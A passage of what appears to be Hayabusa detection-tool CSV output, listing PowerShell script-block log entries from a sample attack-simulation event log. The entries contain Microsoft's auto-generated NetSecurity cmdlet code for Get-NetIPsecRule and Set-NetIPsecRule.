(@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecRule' function Set-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, 
[Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecIn')] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${User}, [Parameter(ParameterSetName='ByIPsecRuleName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Machine}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(Param",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"eterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [System.Management.Automation.WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if 
($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', 
${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 
'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyModule'; ParameterType = 